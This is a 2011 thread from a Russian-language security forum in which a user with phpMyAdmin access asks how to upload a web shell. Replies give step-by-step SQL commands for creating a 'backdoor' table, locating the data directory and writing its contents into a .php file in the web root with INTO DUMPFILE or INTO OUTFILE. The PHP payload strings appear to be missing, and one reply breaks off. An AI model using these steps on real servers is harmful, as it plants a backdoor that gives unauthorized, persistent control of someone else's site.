HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.09.2011, 18:19
good.god
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
Провел на форуме:
1298413

Репутация: 44
Отправить сообщение для good.god с помощью ICQ
По умолчанию

Всем добрый вечер. Есть доступ в пхп май админ. Хотел бы залить шелл.

Почитал немного как можно это сделать, но ничего не вышло. Надеюсь что не из-за моей кривизны рук, а из-за того, что во всех советах фигурировали версии ниже 3 .

Посоветуйте что-нибудь парни.
 
Ответить с цитированием

  #2  
Старый 09.10.2011, 16:22
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Если есть ДБ от сайтов, то попробуй на "дурачку" просто вставляешь в какой то новости или кусочке шаблона, что то типа :
 
Ответить с цитированием

  #3  
Старый 09.10.2011, 16:42
eclipse92
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: -11
По умолчанию

Цитата:
Сообщение от good.god  
good.god said:
Всем добрый вечер. Есть доступ в пхп май админ. Хотел бы залить шелл.
Почитал немного как можно это сделать, но ничего не вышло. Надеюсь что не из-за моей кривизны рук, а из-за того, что во всех советах фигурировали версии ниже 3
.
Посоветуйте что-нибудь парни.
1. Для эстетики и удобства создаем новую базу:

Код:
Code:
CREATE DATABASE 'backdoor'
2. Ищем установочный путь базы

Код:
Code:
SELECT @@datadir > C:\AppServ\MySQL\data\
3. Выполняем запрос на создание таблицы:

Код:
Code:
CREATE TABLE backdoor( Stack TEXT ) TYPE=MYISaM; INSERT INTO backdoor(Stack) VALUES( '
4. Отдаем команду на дамп содержимого таблицы в файл

Код:
Code:
SELECT * into dumpfile '/C:\AppServ\www\s.php' from backdoor;
 
Ответить с цитированием

  #4  
Старый 09.10.2011, 20:14
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

eclipse92 нубяра

select '' into outfile '/dirs/shell.php'

eclipse92, а ты в курсе при каком условии это будет работать?
 
Ответить с цитированием

  #5  
Старый 10.10.2011, 20:22
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от Moriarty  
Moriarty said:
При условии, что PMA не фильтрует кавычки?!
юморист
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ